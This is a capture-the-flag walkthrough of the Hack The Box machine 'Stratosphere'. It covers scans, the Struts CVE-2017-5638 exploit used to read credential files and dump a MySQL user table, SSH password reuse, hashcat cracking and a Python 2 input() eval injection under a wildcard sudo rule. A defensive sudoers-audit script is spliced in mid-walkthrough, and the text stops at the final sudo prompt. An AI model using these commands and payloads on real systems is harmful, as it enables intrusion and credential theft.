Stratosphere
Port scan
u505@naos:~/HTB/Machines/Stratosphere$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.64
Starting masscan 1.0.5 at 2021-01-21 09:39:24 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.64
Discovered open port 22/tcp on 10.10.10.64
Discovered open port 80/tcp on 10.10.10.64
u505@naos:~/HTB/Machines/Stratosphere$ nmap -sC -sV stratosphere
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-21 04:39 EST
Nmap scan report for stratosphere (10.10.10.64)
Host is up (0.037s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|   256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_  256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     <a class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     <a class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|     Connection: close
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|_    Connection: close
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     <a class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     <a class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Date: Thu, 21 Jan 2021 09:48:18 GMT
|_    Connection: close
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.12 seconds
SSH
The SSH service is reachable and accepts password authentication.
u505@naos:~/HTB/Machines/Stratosphere$ ssh u505@stratosphere
The authenticity of host 'stratosphere (10.10.10.64)' can't be established.
ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'stratosphere,10.10.10.64' (ECDSA) to the list of known hosts.
u505@stratosphere's password:
Permission denied, please try again.
u505@stratosphere's password:
Permission denied, please try again.
u505@stratosphere's password:
u505@stratosphere: Permission denied (publickey,password).
Web enumeration
(Screenshot: http://stratosphere.htb home page)
u505@naos:~/HTB/Machines/Stratosphere$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,jsp" -f -t 100 -u http://stratosphere
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: txt, html, jsp | HTTP method: GET | Threads: 100 | Wordlist size: 1102600
Error Log: /opt/utils/dirsearch/logs/errors-21-01-21_04-52-33.log
Target: http://stratosphere/
Output File: /opt/utils/dirsearch/reports/stratosphere/_21-01-21_04-52-33.txt
[04:52:33] Starting:
[04:52:33] 200 -   2KB - /index.html
[04:53:35] 302 -   0B  - /manager/  ->  /manager/html
[04:53:35] 302 -   0B  - /manager  ->  /manager/
[04:54:26] 200 - 203B  - /GettingStarted.html
[04:55:12] 302 -   0B  - /Monitoring  ->  /Monitoring/
[04:55:12] 200 - 199B  - /Monitoring/
[04:57:06] 400 -   0B  - /http%3A%2F%2Fwww.txt
[04:57:06] 400 -   0B  - /http%3A%2F%2Fwww.html
...
Requesting a page that does not exist returns a Tomcat error page that banners the version: Tomcat 8.5.14.
(Screenshot: http://stratosphere.htb/Monitoring/)
The Monitoring application appears to be an Apache Struts application that is still under construction.
Struts vulnerability
After a while enumerating, the CVE page https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-6117/Apache-Struts.html shows that CVE-2017-5638 has a score of 10 and that its date matches the machine's release date.
u505@naos:~/HTB/Machines/Stratosphere$ searchsploit struts
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit) | multiple/remote/24874.rb
Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/33142.rb
Apache Struts - Developer Mode OGNL Execution (Metasploit) | java/remote/31434.rb
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit) | linux/remote/39756.rb
Apache Struts - includeParams Remote Code Execution (Metasploit) | multiple/remote/25980.rb
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities | multiple/webapps/18452.txt
Apache Struts - OGNL Expression Injection | multiple/remote/38549.txt
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/39919.rb
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/43382.py
Apache Struts 1.2.7 - Error Response Cross-Site Scripting | multiple/remote/26542.txt
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution | java/webapps/48917.py
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit) | multiple/remote/27135.rb
Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) | multiple/remote/45367.rb
Apache Struts 2 - Skill Name Remote Code Execution | multiple/remote/37647.txt
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) | multiple/remote/44643.rb
Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities | multiple/webapps/18329.txt
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload | java/webapps/37009.xml
Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting | multiple/remote/35735.txt
Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution | multiple/remote/44556.py
Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass | multiple/remote/36426.txt
Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit) | multiple/remote/18984.rb
Apache Struts 2.2.3 - Multiple Open Redirections | multiple/remote/38666.txt
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) | linux/remote/45260.py
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) | multiple/remote/45262.py
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL I | multiple/remote/41614.rb
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution | linux/webapps/41570.py
Apache Struts 2.3.x Showcase - Remote Code Execution | multiple/webapps/42324.py
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | linux/remote/42627.py
Apache Struts 2.5.20 - Double OGNL evaluation | multiple/remote/49068.py
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Exec | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection | multiple/webapps/44583.txt
Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities | multiple/remote/32565.txt
Struts2/XWork < 2.2.0 - Remote Command Execution | multiple/remote/14360.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Stratosphere$ searchsploit -m 41570
  Exploit: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41570
     Path: /usr/share/exploitdb/exploits/linux/webapps/41570.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Stratosphere/41570.py

u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py
[*] struts2_S2-045.py <url> <cmd>
We have code execution.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action whoami
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: whoami

tomcat8
Local enumeration
I tried to obtain a shell, but the shell did not open.
u505@naos:~/HTB/Machines/Stratosphere$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
We launch a ping from the target.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "ping -c 2 10.10.14.9"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: ping -c 2 10.10.14.9

PING 10.10.14.9 (10.10.14.9) 56(84) bytes of data.

--- 10.10.14.9 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1017ms
But we did receive the echo requests and our replies were sent back; the target simply never counted them.
u505@naos:~/HTB/Machines/Stratosphere$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
05:55:10.242187 IP stratosphere > 10.10.14.9: ICMP echo request, id 1316, seq 1, length 64
05:55:10.242228 IP 10.10.14.9 > stratosphere: ICMP echo reply, id 1316, seq 1, length 64
05:55:11.260345 IP stratosphere > 10.10.14.9: ICMP echo request, id 1316, seq 2, length 64
05:55:11.260385 IP 10.10.14.9 > stratosphere: ICMP echo reply, id 1316, seq 2, length 64
The machine is firewalled and doesn't allow incoming connections on any port but 22, 80 and 8080.
Failed access to tomcat manager
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "cat /etc/tomcat8/tomcat-users.xml"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat /etc/tomcat8/tomcat-users.xml

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui" />
</tomcat-users>
I tried the user and password, but strangely no access was granted.
Database access
In the home directory of the tomcat8 user, the working directory of our command execution, the file db_connect contains database credentials.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "ls -l"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: ls -l

total 16
lrwxrwxrwx 1 root    root      12 Sep  3  2017 conf -> /etc/tomcat8
-rw-r--r-- 1 root    root      68 Oct  2  2017 db_connect
drwxr-xr-x 2 tomcat8 tomcat8 4096 Sep  3  2017 lib
lrwxrwxrwx 1 root    root      17 Sep  3  2017 logs -> ../../log/tomcat8
drwxr-xr-x 2 root    root    4096 Jan 21 04:40 policy
drwxrwxr-x 4 tomcat8 tomcat8 4096 Feb 10  2018 webapps
lrwxrwxrwx 1 root    root      19 Sep  3  2017 work -> ../../cache/tomcat8
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "cat db_connect"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat db_connect

[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin
The command netstat is missing on the machine.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "netstat -ltun"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: netstat -ltun

/bin/bash: netstat: command not found
Reading /proc/net/tcp we can see the listening sockets on the machine; addresses and ports are printed in hexadecimal, and state 0A means LISTEN.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "cat /proc/net/tcp"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat /proc/net/tcp

  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 13199 1 ffff9153b93787c0 100 0 0 10 0
   1: 0100007F:1F45 00000000:0000 0A 00000000:00000000 00:00000000 00000000   115        0 16103 1 ffff9153bb30f800 100 0 0 10 0
   2: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   116        0 15030 1 ffff9153b9378040 100 0 0 10 0
   3: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000   115        0 15181 1 ffff9153bb30f080 100 0 0 10 0
   4: 400A0A0A:1F90 090E0A0A:C0BC 01 00000000:00000000 00:00000000 00000000   115        0 48016 1 ffff9153b93917c0 23 4 28 10 14
   5: 400A0A0A:1F90 090E0A0A:C0BA 06 00000000:00000000 03:0000131E 00000000     0        0 0 3 ffff9153bb32f690
u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 16"|bc
22
u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 1F45"|bc
8005
u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 0CEA"|bc
3306
u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 1F90"|bc
8080
Port 3306 is listening, so we can assume the database is MySQL. We list the databases with the admin credentials from db_connect.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "echo show databases | mysql -u admin -padmin"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: echo show databases | mysql -u admin -padmin

Database
information_schema
users
List the tables.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "echo show tables | mysql -u admin -padmin users"
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: echo show tables | mysql -u admin -padmin users

Tables_in_users
accounts
Describe the table accounts.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action 'echo desc accounts | mysql -u admin -padmin users'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: echo desc accounts | mysql -u admin -padmin users

Field     Type         Null  Key  Default  Extra
fullName  varchar(45)  YES        NULL
password  varchar(30)  YES        NULL
username  varchar(20)  YES        NULL
Query the table.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action 'echo select fullName,password,username from accounts | mysql -u admin -padmin users'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: echo select fullName,password,username from accounts | mysql -u admin -padmin users

fullName          password                   username
Richard F. Smith  9tc*rhKuG5TyXvUJOrE^5CK7k  richard
We found a user and password.
User flag
The user richard is a system user.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action 'cat /etc/passwd'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
saned:x:114:118::/var/lib/saned:/bin/false
richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash
tomcat8:x:115:119::/var/lib/tomcat8:/bin/bash
mysql:x:116:120:MySQL Server,,,:/nonexistent:/bin/false
The password is reused on the system, and SSH access is allowed.
u505@naos:~/HTB/Machines/Stratosphere$ ssh richard@stratosphere
richard@stratosphere's password:
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2
richard@stratosphere:~$ whoami
richard
richard@stratosphere:~$ cat user.txt
<USER_FLAG>
Privilege escalation
richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
    (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
Richard is allowed to execute the file test.py as root.
Challenge script
The test.py script is a hash-cracking challenge: after four correct answers it executes the script /root/success.py as root.
richard@stratosphere:~$ cat test.py
#!/usr/bin/python3
import hashlib


def question():
    q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
    md5 = hashlib.md5()
    md5.update(q1.encode())
    if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
        print("Sorry, that's not right")
        return
    print("You got it!")
    q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
    sha1 = hashlib.sha1()
    sha1.update(q2.encode())
    if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
        print("Nope, that one didn't work...")
        return
    print("WOW, you're really good at this!")
    q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
    md4 = hashlib.new('md4')
    md4.update(q3.encode())
    if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
        print("Yeah, I don't think that's right.")
        return
    print("OK, OK! I get it. You know how to crack hashes...")
    q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
    blake = hashlib.new('BLAKE2b512')
    blake.update(q4.encode())
    if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
        print("You were so close! urg... sorry rules are rules.")
        return

    import os
    os.system('/root/success.py')
    return

question()
Hash cracks
u505@naos:~/HTB/Machines/Stratosphere$ cat hash.md5
5af003e100c80923ec04d65933d382cb
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 0 hash.md5 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 0 hash.md5 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
5af003e100c80923ec04d65933d382cb:kaybboo!
u505@naos:~/HTB/Machines/Stratosphere$ echo "d24f6fb449855ff42344feff18ee2819033529ff" > hash.sha1
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 100 hash.sha1 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 100 hash.sha1 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
d24f6fb449855ff42344feff18ee2819033529ff:ninjaabisshinobi
u505@naos:~/HTB/Machines/Stratosphere$ echo 91ae5fc9ecbca9d346225063f23d2bd9 > hash.md4
u505@naos:~/HTB/Machines/Stratosphere$ hashcat --example-hashes | grep -A 3 -B 1 MD4
MODE: 900
TYPE: MD4
HASH: afe04867ec7a3845145579a95f72eca7
PASS: hashcat
--
TYPE: MS-AzureSync PBKDF2-HMAC-SHA256
HASH: v1;PPH1_MD4,54188415275183448824,100,55b530f052a9af79a7ba9c466dddcb8b116f8babf6c3873a51a3898fb008e123
PASS: hashcat

MODE: 12900
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 900 hash.md4 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 900 hash.md4 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
91ae5fc9ecbca9d346225063f23d2bd9:legend72
u505@naos:~/HTB/Machines/Stratosphere$ hashcat --example-hashes | grep -A 2 -B 1 BLAKE
MODE: 600
TYPE: BLAKE2b-512
HASH: $BLAKE2$296c269e70ac5f0095e6fb47693480f0f7b97ccd0307f5c3bfa4df8f5ca5c9308a0e7108e80a0a9c0ebb715e8b7109b072046c6cd5e155b4cfd2f27216283b1e
PASS: hashcat
u505@naos:~/HTB/Machines/Stratosphere$ echo '$BLAKE2$9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943' > hash.blake
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 600 hash.blake /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 600 hash.blake /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
$BLAKE2$9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943:Fhero6610
Challenge execution
richard@stratosphere:~$ sudo /usr/bin/python /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
kaybboo!
You got it!
Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff
ninjaabisshinobi
WOW, you're really good at this!
How about this? 91ae5fc9ecbca9d346225063f23d2bd9
legend72
OK, OK! I get it. You know how to crack hashes...
Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
Fhero6610
sh: 1: /root/success.py: not found
The challenge was fun, but the script /root/success.py does not exist.
Abuse of test.py
The script test.py reads its answers with the function input. As the Python documentation states, in Python 2.7 input is equivalent to eval(raw_input(prompt)), so under Python 2 whatever is typed at the prompt is evaluated as a Python expression, which gives code execution.
richard@stratosphere:~$ ls -l /usr/bin/python*
lrwxrwxrwx 1 root root 16 Feb 11 2018 /usr/bin/python -> /usr/bin/python3
lrwxrwxrwx 1 root root 9 Jan 24 2017 /usr/bin/python2 -> python2.7
-rwxr-xr-x 1 root root 3779512 Nov 24 2017 /usr/bin/python2.7
lrwxrwxrwx 1 root root 9 Jan 20 2017 /usr/bin/python3 -> python3.5
-rwxr-xr-x 2 root root 4747120 Jan 19 2017 /usr/bin/python3.5
-rwxr-xr-x 2 root root 4747120 Jan 19 2017 /usr/bin/python3.5m
lrwxrwxrwx 1 root root 10 Jan 20 2017 /usr/bin/python3m -> python3.5m
The sudo rule allows Python 2 to be used as the interpreter because of the * in /usr/bin/python*. If we enter an expression that runs the command whoami instead of the correct answer, the script executes the command.
richard@stratosphere:~$ python2 test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('whoami')
richard
Traceback (most recent call last):
File "test.py", line 38, in <module>
question()
File "test.py", line 8, in question
md5.update(q1.encode())
AttributeError: 'int' object has no attribute 'encode'
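As an added defender-side example (not from the original writeup), a Python audit of sudoers command specs that flags exactly the properties the rule above combines: a glob in the command path, an interpreter as the command, and a script argument under the invoking user's home directory. The first sample rule is the one sudo -l reported above; the backup rule is an invented contrast; the regex and the heuristics are mine and cover the common one-line spec form only.

```python
"""Flag sudoers command specs whose binary or arguments the invoking user can influence."""
import os
import re
import shlex

# Constructed sample: the first rule is the one `sudo -l` reported on the target above,
# the second is an invented rule with a fixed binary and fixed arguments for contrast.
SAMPLE_RULES = """\
richard ALL=(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
"""

# user host = (runas) TAG: command [args]   (the runas part and the tags are optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmd>.+)$"
)
# Interpreter names, optionally followed by a version or a glob (python, python2.7, python*).
INTERP_RE = re.compile(r"^(python|perl|ruby|bash|sh|dash|node|php)[0-9.*]*$")


def audit_rule(line):
    """Return a dict describing one command spec and its findings, or None if not a rule."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    argv = shlex.split(m.group("cmd"))
    if not argv:
        return None
    binary = argv[0]
    name = os.path.basename(binary)
    user = m.group("user")
    runas = m.group("runas") or "root"   # sudo's default target user
    findings = []
    if any(ch in binary for ch in "*?["):
        # sudo expands the glob against the file system, so every matching binary is
        # permitted, e.g. /usr/bin/python* covers python2 as well as python3.
        findings.append("wildcard in command path %s: any matching binary is allowed" % binary)
    if INTERP_RE.match(name):
        findings.append("%s is an interpreter: the script argument decides what runs as %s"
                        % (name, runas))
    home = "/home/%s/" % user
    if any(arg.startswith(home) for arg in argv[1:]):
        findings.append("argument under %s: verify that %s cannot modify it" % (home, user))
    return {"user": user, "runas": runas, "argv": argv, "findings": findings}


def audit_sudoers(text):
    """Audit every rule line; comments, blank lines and Defaults entries are skipped."""
    results = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", "Defaults")):
            continue
        result = audit_rule(line)
        if result is not None:
            results.append(result)
    return results


if __name__ == "__main__":
    for r in audit_sudoers(SAMPLE_RULES):
        print("%s -> (%s) %s" % (r["user"], r["runas"], " ".join(r["argv"])))
        for f in r["findings"]:
            print("    !", f)
```

Run it against a real sudoers export (e.g. the output of `sudo -l` reshaped into the one-line form) to spot the same pattern on other hosts.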
We are allowed to execute the command with sudo.
richard@stratosphere:~$ sudo /usr/bin/python2 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
